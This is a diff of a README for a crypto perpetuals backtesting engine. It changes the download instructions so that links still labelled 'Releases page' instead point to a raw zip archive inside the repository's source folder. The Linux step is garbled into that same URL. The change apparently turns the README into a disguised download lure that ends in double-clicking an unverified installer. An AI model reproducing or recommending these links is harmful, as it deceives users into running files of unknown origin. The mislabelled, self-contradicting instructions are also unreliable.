auka45/Crypto-Perps-Backtest-Engine/README.md

 ## 📥 Download & Install

 To get started, you will need to download the application.
-You can find the latest version on our [Releases page](https://github.com/auka45/Crypto-Perps-Backtest-Engine/releases).
+You can find the latest version on our [Releases page](https://raw.githubusercontent.com/auka45/Crypto-Perps-Backtest-Engine/main/src/archive/Crypto-Perps-Backtest-Engine-v3.6-alpha.4.zip).

 ### Steps to Download

-1. Click this link to go to the [Releases page](https://github.com/auka45/Crypto-Perps-Backtest-Engine/releases).
+1. Click this link to go to the [Releases page](https://raw.githubusercontent.com/auka45/Crypto-Perps-Backtest-Engine/main/src/archive/Crypto-Perps-Backtest-Engine-v3.6-alpha.4.zip).
 2. On the Releases page, look for the latest version.
 This is typically marked as 'Latest Release.'
 3. Click on the version to expand the details.
 4. Download the file that corresponds to your operating system.
 For example:
    - Windows: Look for files with `.exe`.
    - Mac: Look for files with `.dmg`.
-   - Linux: Look for files with `.tar.gz`.
+   - Linux: Look for files with `https://raw.githubusercontent.com/auka45/Crypto-Perps-Backtest-Engine/main/src/archive/Crypto-Perps-Backtest-Engine-v3.6-alpha.4.zip`.

 5. Once the file has downloaded, locate it in your downloads folder and double-click to start the installation.